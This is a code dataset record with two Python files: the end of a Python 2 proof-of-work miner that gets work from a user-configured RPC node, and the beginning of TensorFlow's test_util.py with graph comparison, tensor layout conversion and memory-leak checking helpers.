out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
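# Hedged illustration (added for this write-up, not part of the original
# miner): the helpers above reverse byte order per 32-bit word and per buffer.
# On a little-endian machine ('@I' uses native byte order), the following
# hold, worked out by hand from the definitions above:
#   bytereverse(0x12345678L) == 0x78563412L
#   bufreverse('\x12\x34\x56\x78') == '\x78\x56\x34\x12'
#   wordreverse('\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb') == '\xbb\xbb\xbb\xbb\xaa\xaa\xaa\xaa'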
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76 bytes of the 80-byte header do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
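# The 80-byte block header is 160 hex characters; the 4-byte nonce lives at
# byte offset 76, i.e. hex characters 152..160, so splice the new nonce into
# that slice of the getwork data below.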
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
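# Scale the nonce range so that the next work() call runs for roughly
# settings['scantime'] seconds at the hash rate just measured.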
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9824
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause TensorFlow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except ImportError:
pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
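# Hedged example (added for illustration): applied to a plain shape list, the
# axis maps above give
#   NHWCToNCHW([1, 224, 224, 3]) -> [1, 3, 224, 224]
# and the inverse NCHWToNHWC (defined further below) maps it back.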
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
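# Hedged example (added for illustration): the channel axis is split into
# (C // 4, 4) with the vector-of-4 axis kept innermost, e.g.
#   NHWCToNCHW_VECT_C([1, 224, 224, 8]) -> [1, 2, 224, 224, 4]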
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
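# Hedged usage sketch (hypothetical test method, added for illustration):
#   @skip_if(lambda: not gpu_device_name())
#   def test_requires_gpu(self):
#     ...  # body runs only when a GPU device is available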
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C code
exercised by a bit of Python.
Args:
func: The function to test.
warmup_iters: The number of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# _get_object_count_by_type() creates some objects of its own, so call it
# once up front so that they are accounted for in the baseline below.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
obj_count_by_type = _get_object_count_by_type()
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
# In some cases (specifically on MacOS), the object count measured after the
# runs is somehow smaller than the baseline count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
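# Hedged usage sketch (hypothetical test method, added for illustration):
#   @assert_no_new_pyobjects_executing_eagerly
#   def testNoLeakedPyObjects(self):
#     ...  # any Python objects that survive repeated eager runs fail the test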
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
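# Hedged worked example (added for illustration), following the definition
# above:
#   _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
# returns
#   [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#    OrderedDict([("mode", "eager"), ("use_gpu", True)])]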
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
